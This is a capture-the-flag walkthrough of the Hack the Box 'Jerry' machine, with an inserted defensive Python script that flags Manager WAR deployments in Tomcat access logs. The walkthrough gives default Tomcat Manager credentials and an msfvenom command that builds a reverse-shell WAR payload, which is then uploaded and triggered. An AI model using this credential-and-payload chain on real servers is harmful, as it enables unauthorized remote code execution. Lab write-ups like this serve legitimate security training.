
This is the Hack the Box Jerry walkthrough. I cover how to root Jerry without using Metasploit. If you are looking for other Hack the Box tutorials, give Active a shot.

What You Will Learn:

  • Apache Tomcat Manager Exploitation
  • Uploading offensive WAR files
  • Windows enumeration

Here’s What You Need

  • Active VIP Hack the Box Subscription
  • Kali Linux Virtual Machine

Initial Enumeration – Recon

An nmap scan reveals only one open port on the target. AutoRecon confirms this as well.

The landing page of the Apache Tomcat server shows up; click on Manager App to open the Manager. This causes a login form to appear. In a rare twist of events, a nikto scan on the server actually finds the credentials.

Some Googling for default Tomcat Manager credentials leads to the username and password combo of tomcat:s3cret, which turns out to be the right one!


After logging in using the default credentials, we are faced with the Tomcat Web Application Manager.

There is a place at the bottom of the page to upload a new WAR file. But first, I need to generate a WAR file with shellcode in it for a reverse shell connection. For this I am using jsp_shell_reverse_tcp instead of going with a Metasploit payload.

The reason I am using it is that it is a non-staged payload, meaning it runs in one phase and can be caught with a netcat listener.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > shell.war

Now call the shell by either going to 10.10.10.95:8080/myshell or clicking on the myshell link in the left-hand column.
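From the defender's side, the sequence above (Manager login, WAR upload, first request to the new context) is visible in Tomcat's access log. The following is an added example, not part of the original walkthrough: it assumes the AccessLogValve "common" pattern, a stock set of baseline contexts, and constructed sample log lines.

```python
import re

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Manager deployment endpoints: HTML upload form and the text interface.
DEPLOY = re.compile(r'^/manager/(html/upload|text/deploy)\b')
# Contexts shipped with a stock Tomcat (assumption); use your server's own list.
BASELINE = {"", "docs", "examples", "manager", "host-manager"}

def analyze(lines, baseline=BASELINE):
    """Return (timestamp, host, finding) tuples in log order."""
    findings, deployed, seen_new = [], False, set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected pattern
        host, user, ts = m["host"], m["user"], m["ts"]
        path = m["uri"].split("?", 1)[0]
        status = int(m["status"])
        seg = re.match(r"/([^/]+)/", path)
        context = seg.group(1) if seg else ""  # single-segment paths belong to ROOT
        if path.startswith("/manager/") and status == 401:
            findings.append((ts, host, "manager auth failure"))
        elif DEPLOY.match(path) and m["method"] in ("POST", "PUT") and status == 200:
            deployed = True
            findings.append((ts, host, f"WAR deployed via manager by user '{user}'"))
        elif deployed and context not in baseline and context not in seen_new:
            # The HTML upload URL does not name the new context, so it is
            # inferred from the first hit on a context outside the baseline.
            seen_new.add(context)
            findings.append((ts, host, f"first request to unbaselined context '/{context}'"))
    return findings

# Constructed sample log lines (documentation IP ranges, not captured traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:12:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2536',
    '198.51.100.7 - tomcat [01/Jan/2024:12:00:09 +0000] "GET /manager/html HTTP/1.1" 200 17452',
    '198.51.100.7 - tomcat [01/Jan/2024:12:01:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 19873',
    '198.51.100.7 - - [01/Jan/2024:12:01:45 +0000] "GET /myshell/ HTTP/1.1" 200 0',
    '192.0.2.20 - - [01/Jan/2024:12:02:00 +0000] "GET /docs/ HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(*finding, sep="  ")
```
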


The flag is in a common location for flags: the Desktop of the Administrator account. To display the contents of the flag, a text file, use the type command followed by the filename in quotes.

There it is, the final flag, and that wraps up the Hack the Box Jerry walkthrough!
